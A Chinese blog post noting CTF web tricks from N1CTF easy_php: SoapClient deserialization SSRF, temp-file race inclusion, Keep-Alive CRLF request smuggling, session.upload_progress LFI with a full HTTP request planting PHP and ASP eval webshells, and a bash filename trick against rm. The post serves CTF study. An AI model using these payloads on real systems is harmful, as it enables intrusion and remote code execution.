n1 php,从N1CTF easy_php学到的几个骚操作

最新推荐文章于 2023-04-01 21:08:34 发布
最新推荐文章于 2023-04-01 21:08:34 发布
阅读量291 收藏
点赞数
文章标签: n1 php

认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少骚操作,记录下以备查找。

反序列化点SoapClient php自带类的利用

#使用的是SoapClient这个php自带类

# 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求

$a = new SoapClient(null, array(

'location'=> "xxx.xxx.xxx.xxx:8000",

'uri'=> "123"

));

$res = serialize($a);

echo $res;

$a = unserialize($res);

$a->getsubtime();

测试:

4f47c79bc09cb1c0733a5dfa69882b8e.png

/tmp/临时文件竞争

要使用临时文件竞争,phpinfo的环境要有如下配置:

5510abed6f8eccf741a94659d5dea252.png

它大概的原理就是趁系统还没把临时文件删除之前将这个文件包含起来,从而getshell,通常系统的守护进行删除时隔很小,大概在2~3s,所以,我们要使用多线程上传,然后不断刷新包含文件。

Connection: Keep-Alive二次请求

当第一个请求的Connection为Keep-Alive的时候,接着的那个请求也会被响应。也就是说在一次HTTP连接中可以同时又多个HTTP请求头和请求体,但是当前请求被响应的前提是,前一个请求有Connection: Keep-Alive 。 (测试的时候需要注意Content-Length字段,需把burp中的repeater->update content-length选项关掉)

这里就也给了我们一个很重要的启示,如果我们遇到一个GET型的CRLF注入,但是我们需要的却是一个POST类型的请求,就可以用这种方式,在第一个请求中注入一个Connection: Keep-Alive,然后接着往下注入第二个请求,就可以实现我们的目的。

测试代码:

#alive.php

print_r($_GET);

print_r($_POST);

4a6bd6e4ad944e699cf747d3fe3c390e.png

sessions.upload_progress结合LFI getshell

当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度

参考资料:

基于session.upload_progress 的文件上传进度显示

Session 上传进度

本地使用wamp集成环境来做相应演示

session.upload_progress.enabled这个参数在php.ini 默认开启,需要手动置为Off

增加phpinfo.php页面

phpinfo();

?>

通过 phpinfo.php文件中很明显可见:

6707c543f3786c2bbfc0291166825278.png

同时可见存储路径:

57210836d6261f0aa1c23d52858c9f00.png

本地构造上传点,用burp抓包进行重发包

POST / HTTP/1.1

Host: 127.0.0.1:80

Proxy-Connection: keep-alive

Content-Length: 648

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: null

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2rwkUEtFdqhGMHqV

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=5uu8r952rejihbg033m5mckb17

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

=`echo '<?php eval($_REQUEST[bertram])?>'>bertram.php`?>

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="file2"; filename="1.php"

Content-Type: text/php

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="file1"; filename="2.asp"

Content-Type: application/octet-stream

< %eval request("a")%>

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="submit"

Submit

------WebKitFormBoundary2rwkUEtFdqhGMHqV--

服务器就会在.E:/wamp/tmp/sess_5uu8r952rejihbg033m5mckb17中记录这个上传的文件。接着我们不断刷新生成包含恶意php代码的文件,然后通过LFI包含这个文件

利用bash的特性,绕过删除

情景设计,在目录/var/tmp/下一直执行命令rm *.jpg,我们这是该如何才能上传图片上去?

root@VM-201-111-ubuntu:/var/tmp# dir

spider.py

systemd-private-62f616023488426cba41eeaab4c972d3-systemd-timesyncd.service-DcTg0v

systemd-private-c5c2ed65cd2d419ba9d17715ccaa40f6-systemd-timesyncd.service-o93nCB

test

-test.txt

root@VM-201-111-ubuntu:/var/tmp# rm -test.txt

rm: invalid option -- 't'

Try 'rm ./-test.txt' to remove the file '-test.txt'.

Try 'rm --help' for more information.

root@VM-201-111-ubuntu:/var/tmp#

这是因为 bash在做*符号展开之后,直接把-test.jpg传给了rm命令,然后rm命令就把-后面内容全部作为参数解析,导致命令执行失败。

所以只需要上传一个以-开头的文件,就删除不掉了。

瑜某某
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF-easy_php
m0_62593857的博客
02-01 537
ctf-easy_php
NKCTF-easy_php
Keepb1ue的博客
04-01 2492
第一个弱比较绕过,可以通过magic hash 0e开头或者数组绕过。这个是考php非法传参问题。套娃题,需要绕五个过滤。
[2021N1CTF国际赛]Easyphp-Wp
Y4tacker的博客
11-22 2866
文章目录写在前面Wp简单分析小实验验证猜想可效性构造tar参考文章 写在前面 在各种带飞的情况下,web被带ak了,这里比较想写一个easyphp的wp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析 Wp 简单分析 看看首页源码 再看这里很明显是触发phar反序列化 如何插入数据是一个问题,这里没有上传,再看log.php 关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来
记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含
末初的CSDN博客
05-07 914
来源于今天一位朋友给的题目,叫我帮忙看看 题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取logo.php /?page=php://filter/convert.base64-encode/resource=login.php 有过滤,简单fuzz了下发现过滤了如下 base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、..... 但.
CTF-江苏工匠杯easyphp 题解
百彦子烨的博客
11-04 3940
攻防世界-web新手区-江苏工匠杯-easyphp 题解
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
2021 N1CTF CTF 真题.zip
12-07
2021 N1CTF CTF 真题
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF PHP离线chm文档
最新发布
08-09
CTF PHP离线chm文档
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 2225
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
buuctf easyphp
qq_50613938的博客
12-16 481
我们用这个输出 但我不明白为什么,不能直接把“POST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"GET",然后配合_POST[‘a’];” 全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"_GET",然后配合P​OST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替".
[GYCTF2020]Easyphp
shinygod的博客
04-06 1286
知识点:反序列化字符串逃逸,pop链构造 反序列化字符串逃逸 此知识点可以结合题目来看。 https://blog.csdn.net/shinygod/article/details/123724105 分析 /www.zip拿源码 在update.php中可以拿到flag,条件$_SESSION['login']===1在lib.php中 <?php require_once('lib.php'); if ($_SESSION['login']!=1){ echo "你还没有登陆呢!"; } $
php 操作,你知道Laravel ORM 中的操作
weixin_33416900的博客
03-17 145
下面由Laravel入门教程栏目给大家介绍Laravel ORM 中你不知道的操作,希望对需要的朋友有所帮助!appendclass User extends Model{protected $appends = ['is_adult'];public function getIsAdultAttribute(){return $this->attribute['age'] > 18...
CTF中phpinfo应注意什么
qq_45891669的博客
10-04 1826
phpinfo应注意什么 1.allow_url_fopen和allow_url_include 这个配置选项可以知道在PHP文件包含中可以使用哪些伪协议 2.PHP版本 3.open_basedir 这个配置选项可以知道PHP将访问目录限制在哪个目录下 4.disable_functions 可以在命令执行的时候,看那些函数被禁了 5.session session.save_path:session的上传目录 在linux系统中,session文件一般保存在以下几个目录: /var/
[N1CTF 2018]easy_harder_php soap_ssrf
a3320315的博客
01-26 1991
0x01 题目介绍 扫描目录得到源码 function publish() { if(!$this->check_login()) return false; if($this->is_admin == 0) { if(isset($_POST['signature']) && i...
2018 n1ctf easy_hard_php 攻击流程图
lylong0703的博客
09-09 180
2018 n1ctf easy_hard_php 攻击流程图 sqli , clrf , ssrf 流程图 if have any error please figer out ,thank you very much! (my win10’s input method is down suddenly) i’m a beginner of Cyberspace Security.
N1CTF easy_php学到几个操作
Sp4rkW的博客
03-19 4630
认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少操作,记录下以备查找。 反序列化点SoapClient php自带类的利用 #使用的是SoapClient这个php自带类 # 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求 $a = new SoapClient(null, array( 'location'=&amp;...
WHUCTF easyphp代码审计
weixin_44255856的博客
06-09 1759
JSON 数据结构介绍: 按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett 但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如: { "firstName": "Brett", "lastName":...
ctf题目Web_php_include
07-28
回答: 这个CTF题目是一个关于PHP文件包含漏洞的题目。在给定的代码中,使用了include函数来包含一个可控的$page变量。然而,通过使用strstr函数来过滤了包含"php://"的情况。\[1\]但是,我们可以通过大小写绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值